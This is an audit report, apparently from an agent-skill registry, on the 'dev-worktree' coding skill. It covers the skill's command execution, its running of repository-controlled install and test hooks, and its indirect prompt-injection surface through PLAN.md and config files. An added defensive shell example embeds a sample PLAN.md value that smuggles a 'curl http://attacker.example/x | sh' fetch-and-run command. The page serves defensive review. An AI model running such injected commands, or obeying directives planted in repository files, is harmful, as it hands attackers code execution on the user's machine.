Skill path: skills/edwinhu/workflows/dev-worktree

dev-worktree

Pass

Audited by Gen Agent Trust Hub on Mar 17, 2026

Risk Level: SAFE
Risk tags: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION]: The skill performs several shell operations, including git worktree management, local file modification (appending to .gitignore), and automated commits.
  • [REMOTE_CODE_EXECUTION]: The skill automatically detects and runs package installation commands and test runners (e.g., npm install, npm test, pytest, cargo test). These commands execute code defined in the repository's own configuration files (such as package.json or pytest.ini), so an attacker who can modify those files gets code execution on the host as soon as the skill is run against the repository.
  • [EXTERNAL_DOWNLOADS]: The skill initiates outbound network requests to public package registries through npm, pip, poetry, pixi, and go to fetch project dependencies; what is downloaded is determined by the repository's dependency manifests.
  • [PROMPT_INJECTION]: The skill has an indirect prompt injection attack surface via untrusted repository data.
    • Ingestion points: Extracts feature and branch names from .claude/PLAN.md and detects project characteristics from various configuration files (package.json, Cargo.toml, go.mod, etc.).
    • Boundary markers: Absent; the skill does not wrap file contents in delimiters or instruct the model to ignore directives embedded in files read from the workspace.
    • Capability inventory: Comprehensive shell access, git operations, package management (Node.js, Python, Rust, Go), and arbitrary code execution through test runners.
    • Sanitization: The skill uses sed to sanitize the feature name extracted from PLAN.md (keeping only alphanumeric characters and hyphens), which mitigates shell injection through the branch name. It does not validate the configuration files that trigger dependency installation and test execution, so that filter does nothing against the REMOTE_CODE_EXECUTION finding above.
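The sanitization finding and the code-execution finding can be put side by side. What follows is an added example written for this page, not code from the dev-worktree skill or from Gen Agent Trust Hub. It assumes that PLAN.md carries a `Feature:` line and that the skill's sed filter keeps only `[A-Za-z0-9-]` (the audit states the character set but not the exact expression), and it adds a pre-flight listing of npm lifecycle and test scripts, which is the check the audit says the skill does not perform:

```shell
#!/bin/sh
# Added example, not the dev-worktree skill's own code. It mirrors the two
# behaviours the audit describes and adds the pre-flight check the audit says
# is missing. Assumptions (not confirmed by the audit text): PLAN.md carries a
# "Feature: <name>" line, and the skill's sed filter keeps only [A-Za-z0-9-].
set -eu

# Mirror of the described sanitization: drop every byte that is not an ASCII
# letter, digit or hyphen. The result cannot carry shell metacharacters into
# `git worktree add` / `git checkout -b`, which is what the audit credits it for.
sanitize_feature_name() {
    printf '%s' "$1" | sed 's/[^A-Za-z0-9-]//g'
}

# Pull the feature name from a PLAN.md body (assumed "Feature: <name>" line).
# This is the ingestion point: the value is attacker-controlled if the repo is.
extract_feature_name() {
    printf '%s\n' "$1" | sed -n 's/^Feature:[[:space:]]*//p' | head -n 1
}

# Pre-flight check the skill lacks: surface the npm scripts that run
# repository-controlled code the moment `npm install` or `npm test` executes.
# Plain grep over the text (no jq dependency); approximate, but enough to put
# the commands in front of a reviewer before the install step runs.
list_npm_hooks() {
    printf '%s\n' "$1" \
      | grep -oE '"(preinstall|install|postinstall|prepare|prepublish|pretest|test|posttest)"[[:space:]]*:[[:space:]]*"[^"]*"' \
      || true
}

# Constructed sample inputs (not taken from any real repository).
SAMPLE_PLAN_MD='# Plan
Feature: add-login; curl http://attacker.example/x | sh
'
SAMPLE_PACKAGE_JSON='{
  "name": "demo",
  "scripts": {
    "preinstall": "node ./scripts/setup.js",
    "build": "tsc",
    "test": "jest"
  }
}'
CLEAN_PACKAGE_JSON='{ "name": "demo", "scripts": { "build": "tsc" } }'

# Walk-through: the branch name is neutralised, but the install hook is not.
raw=$(extract_feature_name "$SAMPLE_PLAN_MD")
echo "raw feature name:   $raw"
echo "branch-safe name:   $(sanitize_feature_name "$raw")"
echo "scripts that would run on install/test:"
list_npm_hooks "$SAMPLE_PACKAGE_JSON"
```

Run it with `sh`. The hook listing only looks at package.json text; the equivalent for the other ecosystems the audit names is to read the files that decide what the install and test steps execute before those steps run (pytest.ini and any conftest.py for pytest, the build-script entry in Cargo.toml, replace directives in go.mod), because none of them is touched by the sed filter on the feature name.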
Audit Metadata
Risk Level: SAFE
Analyzed: Mar 17, 2026, 02:36 AM